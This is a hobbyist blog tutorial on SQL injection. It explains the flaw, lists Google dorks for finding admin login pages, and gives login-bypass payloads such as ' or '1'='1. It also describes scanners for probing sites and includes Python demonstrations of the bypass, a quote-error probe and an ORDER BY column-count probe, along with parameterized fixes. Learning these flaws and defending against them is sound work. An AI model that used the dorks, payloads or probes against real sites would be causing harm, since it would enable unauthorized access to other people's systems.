What is SQL injection and how it is accomplished



A large number of websites are vulnerable to SQL injection attacks, and I must say the fault lies with the website admin who designed the site. In this post I am going to discuss what SQL injection is and how it is accomplished. Nowadays many noobs find an SQL error in a database with an automated scanner and just exploit it for fun, which is not a good act; I haven't used my skills for any bad purpose either. This post is for the people who don't know that their website is actually vulnerable to such an attack; I am also going to show how it is done and how to catch this vulnerability on your own site. Because of such a vulnerability a hacker can gain access to your website within a minute. Yes, it's true.

What is SQL Injection?
SQL injection is a code injection technique that exploits a security vulnerability in the database layer of an application. The vulnerability is present when user input is either not correctly filtered for string literal escape characters (such as the single quote) before being embedded in an SQL statement, or is not strongly typed (a number taken straight from the URL, for example), so that part of the input is unexpectedly executed as SQL. It is an instance of a more general class of vulnerabilities that occurs whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
In simple words: the hacker types certain characters into the admin login fields so that the query the site builds returns a row even though the password is wrong, and so gains access as admin.

How is basic SQL injection Accomplished?
Google is very helpful in hacking, thanks to the dork technique. Now you will ask: what is a dork?
Dork: a search query crafted to find websites of a specific kind, for example ones with an admin login page, or ones likely to be open to a specific attack type.
A few dorks that are used to find candidate sites are below:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
(Note: I am not giving all the dorks, because that might cross into illegal territory. You may be just learning, but we can't trust everyone.)

These dorks are pasted into the search bar on google.com, and the results are searched for a target website.

After finding the required target, the injection is attempted in the admin login fields: as the password, one of the following injections is entered:
' or '1'='1
' or 'x'='x
(Google for more; it would be illegal if I posted them all here.)

In simple words:
Username : Admin
Password : 'or'1'='1

Hit login and you are in. Not all sites are vulnerable, and this is for learning purposes only; HackersThirst is not responsible for any harm or damage caused.
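To see why typing `' or '1'='1` as the password works, here is a small added example (my own illustration, not code from any real admin panel). It builds the login query the way a naive script does, by gluing the submitted fields into the SQL string, and compares it with the same check written with bound parameters. The user table and the `s3cret` password are constructed for the example.

```python
import sqlite3

# Constructed in-memory user table standing in for the admin login's database.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                 [("Admin", "s3cret"), ("guest", "guest")])


def build_query(username: str, password: str) -> str:
    """The string a naive login script concatenates together.
    Returned separately so the injected SQL can be inspected."""
    return (f"SELECT id FROM users WHERE username = '{username}' "
            f"AND password = '{password}'")


def login_vulnerable(username: str, password: str) -> bool:
    """Vulnerable check: the user is logged in if the concatenated query returns any row.
    With password "' or '1'='1" the WHERE clause becomes
    username = 'Admin' AND password = '' OR '1'='1', which is true for every row."""
    return conn.execute(build_query(username, password)).fetchone() is not None


def login_safe(username: str, password: str) -> bool:
    """Hardened check with bound parameters: the quotes in the payload are data, not SQL."""
    row = conn.execute("SELECT id FROM users WHERE username = ? AND password = ?",
                       (username, password)).fetchone()
    return row is not None


if __name__ == "__main__":
    payload = "' or '1'='1"
    print(build_query("Admin", payload))
    print("vulnerable:", login_vulnerable("Admin", payload))  # True, no password needed
    print("safe:      ", login_safe("Admin", payload))        # False
```

The printed query shows the trick: the attacker's first quote closes the empty password literal, and `or '1'='1` is then parsed as SQL. Since AND binds tighter than OR, the whole condition is true for every row, and the script treats "at least one row" as a successful login. The parameterized version never lets the quote reach the parser, so the same payload is just a wrong password.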


That was just a simple tutorial to give you basic information about SQL injection. There are more advanced techniques too, but I will discuss them some other day.


How to check that your website is vulnerable?
Well, after reading the basics above you should have the concept of SQL injection. Many tools are also available to scan your website or server for such errors in the database. Note: when a probe such as an appended single quote makes the page return a database error, it means your input reached the SQL parser unescaped, and the site is very likely vulnerable.
First Method:
Here is an online scanner:
http://webhosting.blackoutaio.com/~sqli/
For example, if you want to scan www.website-wamiq.com, put this in the scanner bar:
inurl:php?=id+site:website-wamiq.com
If you get:

http://www.website-wamiq.com/product.php?id='3 <== Success

then it means the website is vulnerable and can be exploited easily once the number of columns in the query has been found.
(Note: catid, data and num are also used in addition to id. Simply replace id with your desired value in the scanner's dork.)
Here I have a screenshot of a website that was vulnerable with the dork "data" instead of "id"; the scanner went through it completely and here are the results:
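What the scanner is actually doing with that `id='3` probe, as an added example of my own rather than the scanner's code: it appends a single quote to the parameter and watches for a database error. The snippet below models a product.php?id= style lookup built by string concatenation, a hardened version that validates and binds the id, the quote probe, and (going one step past this post) the ORDER BY probe used afterwards to find the number of columns. The product table is constructed for the example.

```python
import sqlite3

# Constructed in-memory catalogue standing in for the site's product table.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                 [(1, "Keyboard", 19.99), (2, "Mouse", 9.99), (3, "Monitor", 149.0)])


def product_vulnerable(id_param: str):
    """Models a script behind product.php?id=...: the raw parameter is pasted into the SQL.
    Raises sqlite3.Error when the injected text breaks the statement (e.g. "3'")."""
    query = f"SELECT name, price FROM products WHERE id = {id_param}"
    return conn.execute(query).fetchall()


def product_safe(id_param: str):
    """Hardened version: the id must be an integer and is bound as a parameter."""
    product_id = int(id_param)  # ValueError for "3'" before any SQL is built
    return conn.execute("SELECT name, price FROM products WHERE id = ?",
                        (product_id,)).fetchall()


def looks_injectable(lookup, value: str) -> bool:
    """The scanner's single-quote probe: the clean value must work, and the same value
    with a quote appended must produce a database error (the post's 'Success')."""
    try:
        lookup(value)
    except Exception:
        return False          # the clean value already fails: nothing to conclude
    try:
        lookup(value + "'")
    except sqlite3.Error:
        return True           # the quote reached the SQL parser
    except ValueError:
        return False          # rejected by input validation, never reached the database
    return False              # the quote was tolerated, so no error to go on


def count_columns(lookup, value: str, limit: int = 20) -> int:
    """The ORDER BY probe that follows a positive quote test: ORDER BY n errors once n
    exceeds the number of columns the SELECT returns, so the last n that works is the
    column count (0 means the probe never got through)."""
    columns = 0
    for n in range(1, limit + 1):
        try:
            lookup(f"{value} ORDER BY {n}")
        except Exception:
            break
        columns = n
    return columns


if __name__ == "__main__":
    print(product_vulnerable("3"))                          # [('Monitor', 149.0)]
    print(looks_injectable(product_vulnerable, "3"))        # True
    print(looks_injectable(product_safe, "3"))              # False
    print(count_columns(product_vulnerable, "3"))           # 2
```

Run against the vulnerable lookup, the quote probe fires and the ORDER BY loop stops at 3, revealing that the SELECT returns two columns, which is the number an attacker needs for a UNION query. Against the hardened lookup both probes come back empty-handed, because `int()` rejects anything that is not a plain number before a query is ever built.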




Second Method:
Here is an automated scanner, which is for newbies: just click scan and take a rest.
Go to this link for detailed information on how to find an SQL vulnerability in a website.
To get the Acunetix vulnerability scanner trial version, go here.


I hope you are now aware of SQL injection. Further information will be posted later.

Update: read further details below:
How to Use Havij for SQL injection